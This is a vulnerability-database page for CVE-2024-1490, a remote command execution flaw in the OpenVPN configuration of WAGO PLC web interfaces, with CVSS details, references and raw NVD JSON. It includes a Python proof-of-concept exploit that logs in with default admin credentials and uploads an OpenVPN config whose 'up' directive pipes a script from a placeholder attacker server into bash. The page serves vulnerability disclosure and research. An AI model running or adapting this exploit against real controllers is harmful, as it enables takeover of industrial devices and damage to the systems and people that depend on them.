CVE-2024-1490

Description

An authenticated remote attacker with high privileges can exploit the OpenVPN configuration via the web-based management interface of a WAGO PLC. If user-defined scripts are permitted, OpenVPN may allow the execution of arbitrary shell commands enabling the attacker to run arbitrary commands on the device.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WAGO PLC（具体受影响固件版本请参考厂商公告VDE-2024-008）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: WAGO PLC OpenVPN Configuration RCE
# Description: PoC for CVE-2024-1490

TARGET_URL = "https://<TARGET_IP>/vpn/openvpn/config"
USERNAME = "admin"
PASSWORD = "admin"

def exploit():
    session = requests.Session()
    # Step 1: Authenticate to the Web Management Interface
    login_payload = {"username": USERNAME, "password": PASSWORD}
    session.post(f"https://<TARGET_IP>/login", data=login_payload, verify=False)

    # Step 2: Craft malicious OpenVPN configuration
    # The 'up' directive allows executing a shell command when the interface starts
    malicious_config = """dev tun
remote 127.0.0.1
up '/bin/bash -c "curl http://attacker-server/shell.sh | bash"'
"""

    # Step 3: Send the configuration to update OpenVPN settings
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = {"config_content": malicious_config, "action": "save"}
    
    response = session.post(TARGET_URL, data=data, headers=headers, verify=False)

    if response.status_code == 200:
        print("[+] Payload sent successfully. Triggering OpenVPN restart may execute the command.")
    else:
        print("[-] Failed to send payload.")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-1490
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-1490
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-1490/
[4] VulDB https://vuldb.com/cve/CVE-2024-1490
[5] https://certvde.com/de/advisories/VDE-2024-008
[6] https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2024-008.json

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-1490", "sourceIdentifier": "[email protected]", "published": "2026-04-09T11:16:19.657", "lastModified": "2026-04-13T15:02:47.353", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authenticated remote attacker with high privileges can exploit the OpenVPN configuration via the web-based management interface of a WAGO PLC. If user-defined scripts are permitted, OpenVPN may allow the execution of arbitrary shell commands enabling the attacker to run arbitrary commands on the device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2024-008", "source": "[email protected]"}, {"url": "https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2024-008.json", "source": "[email protected]"}]}}